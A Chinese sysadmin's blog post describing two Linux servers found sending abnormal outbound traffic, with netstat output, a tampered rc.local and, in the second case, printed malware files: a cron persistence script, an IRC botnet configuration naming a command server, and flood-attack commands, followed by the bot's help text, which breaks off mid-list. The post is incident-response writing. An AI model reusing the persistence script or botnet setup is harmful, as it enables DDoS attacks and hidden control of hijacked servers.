Linux 服务器中流量跑高的案例
这里就简单说说这个流量跑高。
首先我从cacti 中监控到了一台放在机房的服务器流量异常,何为异常这里说一下:本身这台服务器交换机中限制带宽为两兆峰值,而他却可以跑到100M,按正常情况来说,当你的服务器流量跑满的时候,你的机器会很卡、远程连接会掉线或者根本连不上,所以正常流量来看,是绝对不会跑到100M的,所以这叫流量异常。下面给大家看一下图:
一、
那么当我发现异常后,我就查资料表找出这台机器的IP地址还有系统信息等等。
最终判定这是一台CentOS 5.4 密码为数字加大小写。以下是我查看到的一些信息:
[root@aaa ~]# iptables -L -n
Chain INPUT (policy DROP)
target prot opt source destination
ACCEPT all -- 0.0.0.0/0 0.0.0.0/0 state RELATED,ESTABLISHED
ACCEPT tcp -- 0.0.0.0/0 0.0.0.0/0 tcp dpt:8080
ACCEPT udp -- 0.0.0.0/0 0.0.0.0/0 udp dpt:53
ACCEPT tcp -- 0.0.0.0/0 0.0.0.0/0 tcp dpt:53
ACCEPT tcp -- 0.0.0.0/0 0.0.0.0/0 tcp dpt:80
ACCEPT tcp -- 0.0.0.0/0 0.0.0.0/0 tcp dpt:22
Chain FORWARD (policy ACCEPT)
target prot opt source destination
Chain OUTPUT (policy ACCEPT)
target prot opt source destination
## 这是防火墙规则
[root@aaa ~]# netstat -anptActive Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:60003 0.0.0.0:* LISTEN 3552/cupsdd
tcp 0 0 0.0.0.0:5801 0.0.0.0:* LISTEN 2569/Xvnc
tcp 0 0 0.0.0.0:5802 0.0.0.0:* LISTEN 2613/Xvnc
tcp 0 0 0.0.0.0:3306 0.0.0.0:* LISTEN 2506/mysqld
tcp 0 0 0.0.0.0:14379 0.0.0.0:* LISTEN 3516/ora_d000_thdb
tcp 0 0 0.0.0.0:5803 0.0.0.0:* LISTEN 2674/Xvnc
tcp 0 0 0.0.0.0:5901 0.0.0.0:* LISTEN 2569/Xvnc
tcp 0 0 0.0.0.0:5902 0.0.0.0:* LISTEN 2613/Xvnc
tcp 0 0 0.0.0.0:5903 0.0.0.0:* LISTEN 2674/Xvnc
tcp 0 0 119.57.51.103:80 221.209.56.114:27808 SYN_RECV -
tcp 0 0 119.57.51.103:80 221.209.56.114:27807 SYN_RECV -
tcp 0 0 119.57.51.103:80 206.217.132.75:2229 SYN_RECV -
tcp 0 0 119.57.51.103:80 121.232.7.242:51370 SYN_RECV -
tcp 0 0 119.57.51.103:80 182.185.216.13:53534 SYN_RECV -
tcp 0 0 119.57.51.103:80 111.161.23.92:37697 SYN_RECV -
tcp 0 0 119.57.51.103:80 157.55.35.96:18323 SYN_RECV -
tcp 0 0 119.57.51.103:80 125.39.163.95:30525 SYN_RECV -
tcp 0 0 119.57.51.103:80 183.3.87.80:51903 SYN_RECV -
tcp 0 0 119.57.51.103:80 221.209.56.114:27806 SYN_RECV -
tcp 0 0 119.57.51.103:80 221.209.56.114:27809 SYN_RECV -
tcp 0 0 0.0.0.0:1521 0.0.0.0:* LISTEN 3426/tnslsnr
tcp 0 0 0.0.0.0:6001 0.0.0.0:* LISTEN 2569/Xvnc
tcp 0 0 0.0.0.0:6002 0.0.0.0:* LISTEN 2613/Xvnc
tcp 0 0 0.0.0.0:6003 0.0.0.0:* LISTEN 2674/Xvnc
tcp 0 1 127.0.0.1:50865 127.0.0.1:1521 SYN_SENT 3494/ora_pmon_thdb
tcp 0 0 119.57.51.103:32005 202.103.178.76:10991 ESTABLISHED 3648/atdd
tcp 0 0 119.57.51.103:32007 202.103.178.76:10991 ESTABLISHED 4059/atdd
tcp 0 0 119.57.51.103:32006 202.103.178.76:10991 ESTABLISHED 3760/atdd
tcp 0 0 119.57.51.103:32008 202.103.178.76:10991 ESTABLISHED 3881/atdd
tcp 0 0 119.57.51.103:32011 202.103.178.76:10991 ESTABLISHED 4472/atdd
tcp 0 0 119.57.51.103:32012 202.103.178.76:10991 ESTABLISHED 4300/atdd
tcp 0 0 119.57.51.103:32015 202.103.178.76:10991 ESTABLISHED 4617/atdd
tcp 0 0 119.57.51.103:32014 202.103.178.76:10991 ESTABLISHED 4198/atdd
tcp 0 0 119.57.51.103:64255 121.12.110.96:10991 ESTABLISHED 3558/ksapd
tcp 0 0 119.57.51.103:64259 121.12.110.96:10991 ESTABLISHED 3832/ksapd
tcp 0 0 119.57.51.103:64258 121.12.110.96:10991 ESTABLISHED 3652/ksapd
tcp 0 0 119.57.51.103:64257 121.12.110.96:10991 ESTABLISHED 4527/ksapd
tcp 0 1 119.57.51.103:51903 112.90.252.76:10991 SYN_SENT 4544/kysapd
tcp 0 1 119.57.51.103:51902 112.90.252.76:10991 SYN_SENT 4365/kysapd
tcp 0 1 119.57.51.103:51901 112.90.252.76:10991 SYN_SENT 4291/kysapd
tcp 0 1 119.57.51.103:51900 112.90.252.76:10991 SYN_SENT 3978/kysapd
tcp 0 1 119.57.51.103:51899 112.90.252.76:10991 SYN_SENT 3878/kysapd
tcp 0 1 119.57.51.103:51898 112.90.252.76:10991 SYN_SENT 4154/kysapd
tcp 0 1 119.57.51.103:51897 112.90.252.76:10991 SYN_SENT 3709/kysapd
tcp 0 1 119.57.51.103:51896 112.90.252.76:10991 SYN_SENT 3604/kysapd
tcp 0 1 127.0.0.1:5369 127.0.0.1:6113 SYN_SENT 3426/tnslsnr
tcp 0 0 :::80 :::* LISTEN 2879/httpd
tcp 0 0 :::6001 :::* LISTEN 2569/Xvnc
tcp 0 0 :::6002 :::* LISTEN 2613/Xvnc
tcp 0 0 :::6003 :::* LISTEN 2674/Xvnc
tcp 0 0 :::22 :::* LISTEN 2448/sshd
tcp 0 0 ::ffff:119.57.51.103:80 ::ffff:157.55.34.74:57650 TIME_WAIT -
tcp 0 64 ::ffff:119.57.51.103:22 ::ffff:119.57.180.130:46177 ESTABLISHED 6691/sshd: root@not
tcp 0 29866 ::ffff:119.57.51.103:80 ::ffff:157.55.32.154:24818 FIN_WAIT1 -
tcp 0 0 ::ffff:119.57.51.103:80 ::ffff:218.106.154.11:14554 TIME_WAIT -
tcp 0 0 ::ffff:119.57.51.103:80 ::ffff:218.106.154.11:13526 TIME_WAIT -
tcp 0 0 ::ffff:119.57.51.103:80 ::ffff:180.173.86.128:1107 TIME_WAIT -
tcp 0 6692 ::ffff:119.57.51.103:22 ::ffff:114.250.249.21:56821 ESTABLISHED 7269/0
tcp 0 0 ::ffff:119.57.51.103:80 ::ffff:182.118.19.211:10424 TIME_WAIT -
tcp 0 0 ::ffff:119.57.51.103:80 ::ffff:60.190.138.140:35502 TIME_WAIT -
tcp 0 0 ::ffff:119.57.51.103:80 ::ffff:221.224.14.222:59613 FIN_WAIT2 7271/httpd
tcp 0 0 ::ffff:119.57.51.103:80 ::ffff:221.224.14.222:59615 ESTABLISHED 7506/httpd
tcp 0 0 ::ffff:119.57.51.103:80 ::ffff:221.224.14.222:59614 FIN_WAIT2 7507/httpd
tcp 0 0 ::ffff:119.57.51.103:80 ::ffff:221.224.14.222:59611 FIN_WAIT2 7505/httpd
tcp 0 0 ::ffff:119.57.51.103:80 ::ffff:183.60.214.28:55574 TIME_WAIT -
tcp 0 0 ::ffff:119.57.51.103:80 ::ffff:182.118.19.109:46068 TIME_WAIT -
tcp 0 0 ::ffff:119.57.51.103:80 ::ffff:157.55.34.74:63141 TIME_WAIT -
tcp 0 0 ::ffff:119.57.51.103:80 ::ffff:157.55.34.74:11155 TIME_WAIT -
tcp 0 0 ::ffff:119.57.51.103:80 ::ffff:182.118.19.127:54739 TIME_WAIT -
tcp 0 0 ::ffff:119.57.51.103:80 ::ffff:218.106.154.11:15706 TIME_WAIT -
tcp 0 0 ::ffff:119.57.51.103:80 ::ffff:221.224.14.222:59617 FIN_WAIT2 7509/httpd
tcp 0 0 ::ffff:119.57.51.103:80 ::ffff:221.224.14.222:59616 FIN_WAIT2 7508/httpd
tcp 0 0 ::ffff:119.57.51.103:80 ::ffff:218.106.154.11:13094 TIME_WAIT -
tcp 0 0 ::ffff:119.57.51.103:80 ::ffff:182.118.28.30:29387 TIME_WAIT -
tcp 0 1 ::ffff:119.57.51.103:80 ::ffff:125.39.172.32:37149 LAST_ACK -
tcp 0 0 ::ffff:119.57.51.103:80 ::ffff:157.55.34.74:56558 TIME_WAIT -
tcp 0 0 ::ffff:119.57.51.103:80 ::ffff:218.106.154.11:13315 TIME_WAIT -
tcp 0 0 ::ffff:119.57.51.103:80 ::ffff:81.91.9.160:57503 FIN_WAIT2 -
tcp 0 0 ::ffff:119.57.51.103:80 ::ffff:81.91.9.160:57499 FIN_WAIT2 -
tcp 0 0 ::ffff:119.57.51.103:80 ::ffff:183.60.213.114:45041 TIME_WAIT -
tcp 0 0 ::ffff:119.57.51.103:80 ::ffff:60.176.253.144:30624 TIME_WAIT -
tcp 0 0 ::ffff:119.57.51.103:80 ::ffff:182.118.21.34:16701 ESTABLISHED 7450/httpd
tcp 0 0 ::ffff:119.57.51.103:80 ::ffff:60.176.253.144:30626 TIME_WAIT -
tcp 0 0 ::ffff:119.57.51.103:80 ::ffff:60.176.253.144:30627 TIME_WAIT -
tcp 0 0 ::ffff:119.57.51.103:80 ::ffff:60.176.253.144:30628 TIME_WAIT -
tcp 0 0 ::ffff:119.57.51.103:80 ::ffff:60.176.253.144:30620 TIME_WAIT -
tcp 0 0 ::ffff:119.57.51.103:80 ::ffff:157.55.35.96:58678 TIME_WAIT -
tcp 0 0 ::ffff:119.57.51.103:80 ::ffff:206.217.132.75:2132 FIN_WAIT2 7276/httpd
tcp 0 0 ::ffff:119.57.51.103:80 ::ffff:157.55.35.96:50474 TIME_WAIT -
tcp 0 0 ::ffff:119.57.51.103:80 ::ffff:61.55.192.181:3096 TIME_WAIT -
tcp 0 0 ::ffff:119.57.51.103:80 ::ffff:61.55.192.181:3095 TIME_WAIT -
tcp 0 0 ::ffff:119.57.51.103:80 ::ffff:61.55.192.181:3094 TIME_WAIT -
tcp 0 0 ::ffff:119.57.51.103:80 ::ffff:61.55.192.181:3093 TIME_WAIT -
tcp 0 0 ::ffff:119.57.51.103:80 ::ffff:81.91.9.160:57505 FIN_WAIT2 -
tcp 0 0 ::ffff:119.57.51.103:80 ::ffff:157.55.35.96:64322 TIME_WAIT -
tcp 0 0 ::ffff:119.57.51.103:80 ::ffff:182.118.19.84:61477 TIME_WAIT -
tcp 0 0 ::ffff:119.57.51.103:80 ::ffff:49.81.2.181:8203 TIME_WAIT -
tcp 0 0 ::ffff:119.57.51.103:80 ::ffff:49.81.2.181:8200 TIME_WAIT -
tcp 0 0 ::ffff:119.57.51.103:80 ::ffff:49.81.2.181:8204 TIME_WAIT -
tcp 0 0 ::ffff:119.57.51.103:80 ::ffff:49.81.2.181:8218 TIME_WAIT -
tcp 0 0 ::ffff:119.57.51.103:80 ::ffff:60.176.253.144:30754 TIME_WAIT -
tcp 0 0 ::ffff:119.57.51.103:80 ::ffff:49.81.2.181:8211 TIME_WAIT -
tcp 0 37440 ::ffff:119.57.51.103:80 ::ffff:118.250.130.121:7924 ESTABLISHED 6929/httpd
tcp 0 0 ::ffff:119.57.51.103:80 ::ffff:49.81.2.181:8210 TIME_WAIT -
tcp 0 0 ::ffff:119.57.51.103:80 ::ffff:157.55.35.96:38531 TIME_WAIT -
tcp 0 0 ::ffff:119.57.51.103:80 ::ffff:49.81.2.181:8214 TIME_WAIT -
tcp 0 0 ::ffff:119.57.51.103:80 ::ffff:49.81.2.181:8213 TIME_WAIT -
tcp 0 0 ::ffff:119.57.51.103:80 ::ffff:49.81.2.181:8212 TIME_WAIT -
tcp 0 0 ::ffff:119.57.51.103:80 ::ffff:111.164.196.141:9503 TIME_WAIT -
tcp 0 0 ::ffff:119.57.51.103:80 ::ffff:111.164.196.141:9504 TIME_WAIT -
tcp 0 0 ::ffff:119.57.51.103:80 ::ffff:61.55.192.181:3231 FIN_WAIT2 -
tcp 0 0 ::ffff:119.57.51.103:80 ::ffff:61.55.192.181:3230 FIN_WAIT2 -
tcp 0 0 ::ffff:119.57.51.103:80 ::ffff:110.177.0.129:60133 ESTABLISHED 7518/httpd
tcp 0 0 ::ffff:119.57.51.103:80 ::ffff:110.177.0.129:60132 ESTABLISHED 7512/httpd
tcp 0 21900 ::ffff:119.57.51.103:80 ::ffff:157.55.33.50:48368 ESTABLISHED 7514/httpd
tcp 0 0 ::ffff:119.57.51.103:80 ::ffff:111.164.196.141:9530 TIME_WAIT -
tcp 0 0 ::ffff:119.57.51.103:80 ::ffff:110.177.0.129:60134 ESTABLISHED 7442/httpd
tcp 0 0 ::ffff:119.57.51.103:80 ::ffff:110.177.0.129:60129 ESTABLISHED 7516/httpd
tcp 0 0 ::ffff:119.57.51.103:80 ::ffff:111.164.196.141:9532 FIN_WAIT2 -
tcp 0 0 ::ffff:119.57.51.103:80 ::ffff:110.177.0.129:60131 ESTABLISHED 7517/httpd
tcp 0 0 ::ffff:119.57.51.103:80 ::ffff:110.177.0.129:60130 ESTABLISHED 7519/httpd
tcp 0 0 ::ffff:119.57.51.103:80 ::ffff:111.164.196.141:9543 TIME_WAIT -
tcp 0 1 ::ffff:119.57.51.103:80 ::ffff:111.164.196.141:8519 LAST_ACK -
tcp 0 1 ::ffff:119.57.51.103:80 ::ffff:111.164.196.141:8520 LAST_ACK -
tcp 0 1 ::ffff:119.57.51.103:80 ::ffff:111.164.196.141:8521 LAST_ACK -
tcp 0 2602 ::ffff:119.57.51.103:80 ::ffff:157.55.35.96:12748 FIN_WAIT1 -
tcp 0 0 ::ffff:119.57.51.103:80 ::ffff:121.232.7.242:51371 TIME_WAIT -
tcp 0 1331 ::ffff:119.57.51.103:80 ::ffff:182.185.216.13:53468 ESTABLISHED 7440/httpd
tcp 0 0 ::ffff:119.57.51.103:80 ::ffff:60.176.253.144:30810 TIME_WAIT -
tcp 0 0 ::ffff:119.57.51.103:80 ::ffff:81.91.9.160:57459 FIN_WAIT2 -
tcp 0 0 ::ffff:119.57.51.103:80 ::ffff:60.176.253.144:30812 TIME_WAIT -
## 这是监听的端口及运行的进程 可以看到好多atdd ksapd kysapd 还有一个cupsdd 这些都是不正常的进程
[root@aaa ~]# cat /etc/rc.local
#!/bin/sh
# This script will be executed *after* all the other init scripts.
# You can put your own initialization stuff in here if you don't
# want to do the full Sys V style init stuff.
nohup /etc/cupsdd > /dev/null 2>&1&
cd /etc;./ksapd
cd /etc;./kysapd
cd /etc;./atdd
nohup /etc/cupsdd > /dev/null 2>&1&
cd /etc;./ksapd
cd /etc;./kysapd
cd /etc;./atdd
nohup /etc/cupsdd > /dev/null 2>&1&
cd /etc;./ksapd
cd /etc;./kysapd
cd /etc;./atdd
nohup /etc/cupsdd > /dev/null 2>&1&
cd /etc;./ksapd
cd /etc;./kysapd
cd /etc;./atdd
nohup /etc/cupsdd > /dev/null 2>&1&
cd /etc;./ksapd
cd /etc;./kysapd
cd /etc;./atdd
nohup /etc/cupsdd > /dev/null 2>&1&
cd /etc;./ksapd
cd /etc;./kysapd
cd /etc;./atdd
nohup /etc/cupsdd > /dev/null 2>&1&
cd /etc;./ksapd
cd /etc;./kysapd
cd /etc;./atdd
nohup /etc/cupsdd > /dev/null 2>&1&
cd /etc;./ksapd
cd /etc;./kysapd
cd /etc;./atdd
## 这是我的rc.local 文件 被加入了好多东西,网查发现正是这些东西导致服务器大量向外发包
那以上就是这次案例的一些文字东西了,在这里向大家说一声密码一定不能简单化,尤其是公网IP,处理方法的话就把他随机器启动的一些文件全部删除,把他添加的一些东西删除掉,不过 强烈建议重新做系统,安全要做好!
二、
这次遇到的情况跟上面不同,由于不是我自己的机器所有没有办法详细的做记录。具体情况也是服务器流量异常,80 多兆 向外发包,系统:CentOS 、环境:apache mysql php 重启之后就会恢复正常。以下是我的处理过程。
重启机器后我登录服务器,以我的经验来对他的系统做检查,首先我查看系统日志发现没有异常;运行中的进程更没有异常,因为故障已经恢复了;然后我又去查看他的 rc.local 文件,发现也是正常的;查看任务计划,正常;命令历史正常,正常;系统用户,正常。到这我就奇怪了,跟我处理过的情况完全不同。没办法,既然现在看不出来问题,那就只能等下次出问题了,然后我告诉他:当下次机器流量异常的时候,让机房技术帮忙执行几个命令后在重启(netstat -anp >run.txt、ps aux >ps.txt),这样我是想通过这些状态来判断到底是什么东西在作怪,结果很遗憾.... 基本看不出什么问题!然后我继续找,突然间发现 /var/log/cron 日志文件有问题,在运行着 /var/tmp/.,/ 这个目录低下的一些东西,我马上进入这个隐藏目录下,这不看不知道,一看吓一跳:你妹啊 有这么多东西。通过文件分析,我发现文件中环境变量改为了当前,然后通过 crond 执行着一些脚本,唉,我也弄不清楚啥意思 管他呢,全部删除、修改 root 密码、ssh 端口号,清掉这个用户的任务计划。然后我又查看了一下之前的 cron 日志,发现还有别的目录存在过这些东西,当我想切进去的时候,发现目录没有了。呃 可能是人家已经换过几次目录了.... 这些文件是好久前就有的,唉可怜的机器啊。他网站用着 dedecms ,很有可能是通过这些漏洞上传的木马文件、还要注意 php ddos 、phpmyadmin 这些。下面贴几个文件的内容:
autorun
#!/bin/sh
pwd > dir
dir=$(cat dir)
echo "* * * * * $dir/update >/dev/null 2>&1" > cron
crontab cron
crontab -l | grep update
echo "#!/bin/sh
if test -r $dir/mech.pid; then
pid=\$(cat $dir/mech.pid)
if \$(kill -CHLD \$pid >/dev/null 2>&1)
then
exit 0
fi
fi
cd $dir
./run &>/dev/null" > update
chmod u+x update
run
#!/bin/sh
export PATH=.
crond
start
/#bin/bash
./autorun
./run
cron
* * * * * /var/tmp/flood/update >/dev/null 2>&1
update
#!/bin/sh
if test -r /var/tmp/flood/mech.pid; then
pid=$(cat /var/tmp/flood/mech.pid)
if $(kill -CHLD $pid >/dev/null 2>&1)
then
exit 0
fi
fi
cd /var/tmp/flood
./run &>/dev/null
fwd
handle copos
mask *!*@copos
prot 4
aop
channel *
access 100
mech.set
NICK notice
USERFILE 1
CMDCHAR !
LOGIN getlost
IRCNAME int main();
MODES +ix-ws
TOG CC 1
TOG CLOAK 1
TOG SPY 1
SET OPMODES 4
SET BANMODES 6
SET AAWAY 0
TOG NOIDLE 1
CHANNEL #flood
TOG PUB 1
TOG MASS 1
TOG SHIT 1
TOG PROT 1
TOG ENFM 1
SET ENFM +nts
SET MDL 4
SET MKL 4
SET MBL 4
SET MPL 1
SERVER ircdundernet.zapto.org 8080
mech.help
:// special //
:levels
Built in levels
Level 10: Partyline user.
User below this level can not DCC CHAT the mech.
Level 70: Channel master.
User can get the mech to join new channels by inviting it.
Level 80: Bot master.
User may change protected topics, enforced modes, is not
checked for massmodes/masskicks/clones/revenge kick, can
remove passwords with SETPASS, always gets ctcp ping
replies and is not affected by PROT levels of other users.
Level 100: Owner.
Superuser, what can he *not* do?
Level 200: Bot.
Bots can not execute commands by /msg or in any other way.
Is also unaffected by massmodes/kicks/clones/revenge, etc...
Only bots added with botlevel (200) will be autoopped as
a responce to NEEDOP across network links with other bots.
:protection
Protection level can be 0 through 4 where the specific levels
are as follows:
0 No protection.
1 Reop/unban, do nothing to offender.
2 Reop/unban, deop offender.
3 Reop/unban, kick offender.
4 Reop/unban, kickban offender.
Protection must be toggled on for a channel for anything to happen.
See also: USER
:------------------------------------------------------------------------------
:// commands //
:w2k
Usage: .... You CANT!
You're doomed if you try!
:access
Usage: ACCESS [channel] [nick|userhost]
Show someones access level. If no arguments are given, the bot
will display your access level.
See also: USTATS, USERLIST
:add
Usage: ADD
Adds a user on all channels (*) or a certain channel. The handle is
used reference the user in other commands.
level Can be between 0 and 100, or 200 for bots.
aop Either 0 or 1 (0 = no, 1 = yes)
prot Can be 0 through 4. See "HELP protection" for information
on protection levels.
pass Assigns the person a password.
Note: If no arguments are given except the userlevel, all others are
assumed to be 0 with no password.
See also: DEL, HOST
:addserver
Usage: ADDSERVER
Adds a server to the EnergyMechs internal server list.
If no port is given, the default of 6667 is used.
See also: SERVER, SERVERLIST, DELSERVER
:away
Usage: AWAY [message]
Sets the bot away. If no message is specified, previous
away status and message is removed.
:ban
Usage: BAN [channel]
Ban a user on a channel. If a mask is given,
a ban using the mask will be placed.
See also: UNBAN, SITEBAN, KB, SCREW
:banlist
Usage: BANLIST [channel]
Show the banlist for a channel.
See also: BAN, UNBAN
:cchan
Usage: CCHAN [channel]
Return or set the current channel.
See also: JOIN, PART, CHANNELS
:chaccess
Usage: CHACCESS
Changes the level needed to do a command.
See also: LOADLEVELS, SAVELEVELS
:channels
Usage: CHANNELS
Lists the channels the bot is active on.
See also: JOIN, PART, FORGET
:chat
Usage: CHAT
Make the bot DCC chat you.
:clearshit
Usage: CLEARSHIT
Clears the shitlist.
See also: RSHIT, SHIT
:clvl
Usage: CLVL
Changes the level of a user.
See also: ACCESS
:cmd
Usage: CMD [=botnick]
Send a command to linked bots. You can specify a single
bot to execute the command. Authentication is done on
target bot(s), not the bot you send the command from.
See also: LINK
:core
Usage: CORE
Shows core information about the bot.
See also: VER, UPTIME, ONTIME
:cserv
Usage: CSERV
Shows current server the bot is connected to.
See also: SERVERLIST, NEXTSERVER, SERVER
:ctcp
Usage: CTCP
Send a CTCP request to a user.
:cycle
Usage: CYCLE
Quickly part and rejoin a channel.
See also: JOIN, PART
:del
Usage: DEL
Deletes someone from the bots userlist.
See also: DEL, HOST, USERLIST
:delserver
Usage: DELSERVER
Deletes a server from mechs internal server list.
If no port is given, it searches for a matching
server, ignoring port number unless there are
several servers in the list that matches, in which
case a port must be specified.
See also: SERVERLIST, ADDSERVER
:deop
Usage: DEOP [channel]
Deop a user or users matching the given mask on
a certain channel. With a mask, only users with
access below the MAL setting are affected.
See also: DOWN, OP, MODE
:die
Usage: DIE [reason]
Kills the bot. If session file is in use, use the
SHUTDOWN command instead to preserve the configurations
for all bots. If DIE is used, the killed bot(s) will
not be saved to the session file.
See also: RESET, REHASH, SHUTDOWN
:do
Usage: Flood Bot
Juno shellcmd ./j ip port
Stealth shellcmd ./s ip port
Vadim I shellcmd ./v1 ip port ip_spoof
Vadim II shellcmd ./v2 ip port 10 0
:down
Usage: DOWN [channel]
Deop you on a channel.
See also: DEOP, UP, MODE
:echo
Usage: ECHO
Turns on and off partyline echoing of your own messages.
See also: CHAT
:esay
Usage: ESAY [channel]
Works like SAY with some enhancements. As the bot parses the text
it replaces predefined variables with their current value:
$cc Current channel
$channels Channels
$on Ontime
$time Current time
$tog(x) Show current setting for toggle "x"
$up Uptime
$ver EnergyMech version
$links Show active links
See also: SAY
:flood
Usage: FLOOD
Floods a user with CTCP requests.
:forget
Usage: FORGET
Deletes a channel from memory
See also: PART, JOIN
:help
Usage: HELP [topic|command|level|pattern]
Online help system.
If no argument is given, all available commands available are
listed grouped by access level.
See also: USAGE
:host
Usage: HOST
Add or delete usermasks for a user.
See also: ADD, DEL
:idle
Usage: IDLE
Show how long a person has been idle.
See also: SHOWIDLE
:insult
Usage: INSULT [nick|channel]
Send a random insult to a user or channel.
See also: PICKUP
:invite
Usage: INVITE [channel] [nick]
Invite someone to a certain channel. If no nick is given,
it defaults to inviting you.
:join
Usage: JOIN
Makes the bot join a channel
See also: CYCLE, PART
:kb
Usage: KB [channel]
Kickban a user from a channel.
See also: BAN, KICK, SCREW, SHIT
:kick
Usage: KICK [channel]
Kick a user from a channel.
See also: KB, SCREW, SHIT
:ks
Usage: KS
Adds a kicksay...the bot kicks users when they say the words
See also: KSLIST, RKS
:kslist
Usage: KSLIST
Shows the kicksay list
See also: KS, RKS
:last
Usage: LAST [number of commands]
Shows the last commands done, and who did them
Default is 10, and goes up to 20
:link
Usage: LINK [
LINK with no arguments lists all known entities.
UP
DOWN
ADD
Add an entity to the list of known entities.
DEL
PORT
See also: CMD
:links
Usage: LINKS
Gives you a list of active servers on the network
See also: STATS
:load
Usage: LOAD
Loads everything that can be loaded
See also: SAVE, LOADLEVELS, LOADLISTS
:loadlevels
Usage: LOADLEVELS
Loads the levels list
See also: SAVELEVELS, LOAD
:loadlists
Usage: LOADLISTS
Loads the userlist/shitlist file
See also: SAVELISTS, LOAD
:lusers
Usage: LUSERS
Same as the irc command /lusers
See also: STATS
:me
Usage: ME [channel]
Make the bot do an action on a certain channel
See also: SAY, ESAY, MSG
:mode
Usage: MODE
Set or unset channel modes.
See also: OP, DEOP, VOICE, UNVOICE
:msg
Usage: MSG
Send a message to a person or channel.
See also: SAY, ESAY, ME
:names
Usage: NAMES [channel]
Shows names on the specified channel
See also: WHO
:nextserver
Usage: NEXTSERVER
Makes the bot go to the next server in the serverlist
You can also do 'kill -USR1
to make it switch server.
See also: SERVER, ADDSERVER, SERVERLIST
:nick
Usage: NICK
Changes the nick of the bot. If the nick given is already
in use, the bot will not change its nickname until the
occupied nick is available.
:ontime
Usage: ONTIME
Shows time connected to current server.
See also: UPTIME
:op
Usage: OP [channel] [nick|mask]
Op someone on a given channel. Defaults to opping
you in the channel where the command is given.
See also: UP, DEOP, MODE
:part
Usage: PART
Makes the bot leave a certain channel. To purge the channel
completely from memory, use the FORGET command once it has
parted.
See also: JOIN, FORGET
:passwd
Usage: PASSWD [oldpassword]
Changes your password on the bot. The oldpassword parameter only
has to be given if a password is already set.
Note: Passwords are case-sensitive and are encrypted so not even
bot runners will know your password.
See also: SETPASS
:qshit
Usage: QSHIT
Quick shit. Uses preset defaults for channel and shitlevel.
See also: SHIT, RSHIT, SHITLIST
:rehash
Usage: REHASH
Reloads the bot
See also: RESET, DIE
:report
Usage: REPORT
Gives you a detailed report on the bot, what
Toggles are on, Sets, etc.
See also: SET, TOG
:reset
Usage: RESET
Restarts the bot completely. Same as killing the bot
and restarting it from the shell.
See also: REHASH, DIE
:rks
Usage: RSK
Removes a kicksay
See also: KS, KSLIST
:rshit
Usage: RSHIT
Removes someone from the shitlist
See also: SHIT, SHITLIST
:rspy
Usage: RSPY
Stop spying on a certain channel
Note: If a nick or channel is given at the end...that person/channel
will be removed from spying
See also: SPY, SPYMSG, SPYLIST
:rspymsg
Usage: RSPYMSG [nick]
Stop redirecting private messages teh bot receives
Note: If a nick is given, that person will be removed from
receiving the private messages
See also: SPYMSG, SPY, SPYLIST
:rstatmsg
Usage: RSTATMSG
Turns off stat messages in the partyline.
See also: STATMSG, SPYLIST
:rsteal
Usage: RSTEAL
Makes the bot stop trying to steal a channel
See also: STEAL
:rt
Usage: RT
Sets a random topic.
See also: TOPIC
:save
Usage: SAVE
Saves the entire enchilada.
See also: LOAD, SAVELEVELS, SAVELISTS
:savelevels
Usage: SAVELEVELS
Saves the level list
See also: LOADLEVELS, SAVE
:savelists
Usage: SAVELISTS
Saves the userlist/shitlist file
See also: LOADLISTS, SAVE
:say
Usage: SAY
Send a message to a channel.
See also: ME, ESAY, MSG
:screw
Usage: SCREW [channel]
Kickban a user on a channel and place two bans using
randomized masks.
:seen
Usage: SEEN
Information on when someone was last seen by the bot.
:server
Usage: SERVER
Makes the bot switch servers. You can also specify
a new login and ircname for the bot.
See also: CSERV, NEXTSERVER, SERVERLIST
:serverlist
Usage: SERVERLIST
Shows the serverlist.
See also: SERVER, ADDSERVER, CSERV
:set
Usage: SET [channel]
Change a setting. If * is entered for channel,
all channels will be set to this setting.
See also: TOG, REPORT
:setpass
Usage: SETPASS
Sets the password for a user
See also: VERIFY, PASSWD
:shit
Usage: SHIT
Shitlists someone on all channels (*) or a certain channel
Level - can be 1 through 3
1 - doesn't let the person be opped or voiced
2 - will kb the person
3 - rebans the person when unbanned by anyone
Expire - the number of days the shitlist will be good for (default is 30)
Reason - reason for the shitlist...displays it on kickban
Note: The bot checks for shitlisted users on join, nick switch, and
when the bot is opped
See also: RSHIT, QSHIT, SHITLIST
:shitlist
Usage: SHITLIST
Shows the bots shitlist.
See also: SHIT, RSHIT, QSHIT, SHITLVL
:shitlvl
Usage: SHITLVL
Changes the shitlist level on the specified person
See also, SHIT, RSHIT, SHITLIST
:showidle
Usage: SHOWIDLE [seconds]
This will show how long people are idle
If a number of seconds is given, it will only show people
idle for more than that amount of time
See also: IDLE
:shutdown
Usage: SHUTDOWN
Kills all bots and exits. The mech will have to be restarted
manually hand if you want it to return. If a crontab entry
exists to keep the bot running, it will restart the bot once
cron runs it.
If a session file is in use, SHUTDOWN is the proper method
to kill the process. DIE will delete the killed bot(s) from
the session file.
See also: DIE, RESET
:siteban
Usage: SITEBAN [channel]
Sitebans someone on a certain channel
See also: BAN, SCREW, SHIT
:sitekb
Usage: SITEKB [channel]
Sitekickbans someone on a certain channel
See also: KB, SCREW, SHIT
:spawn
Usage: SPAWN [nick] [options]
Spawns a new bot with the given nickname. If no nickname
is given, one is chosen at random from randnicks.e.
The ircname option has to be put last if its used, since
everything after the ircname option is regarded as being
part of the ircname to be set. Thus, "-i monkey -z ."
would set the ircname to "monkey -z ."
Options:
-c channelname Channel to join
-i ircname Ircname to use
-l login Login to use
-p port Server port
-s servername Server hostname
-v virtual Virtual address to use
-w wingate:port Wingate to use
-z command char Command char to use
Example: SPAWN Lamah -s irc.lame.net -l fuxor -z [ -i Ahuh
See also: DIE
:spy
Usage: SPY
Spy on a certain channel
Note: if a channel is given at the end...the bot will redirect
to that channel instead of to you
See also: RSPY, SPYMSG, SPYLIST
:spylist
Usage: SPYLIST
Shows who's spying on a certain channel
See also: SPY, SPYMSG
:spymsg
Usage: SPYMSG
Redirects private messages the bot receives
See also: RSPYMSG, SPY, SPYLIST
:statmsg
Usage: STATMSG
Turn on partyline status messages.
See also: RSTATMSG
:stats
Usage: STATS
Show server status lines.
See also: LINKS, LUSERS
:steal
Usage: STEAL
Makes the bot try and steal a channel
See also: RSTEAL
:time
Usage: TIME
Show current time (where the bot is)
See also: UPTIME, ONTIME
:tog
Usage: TOG [channel]
Toggle a setting. If * is entered for channel,
all channels will be affected by the change.
See also: SET, REPORT
:topic
Usage: TOPIC [channel]
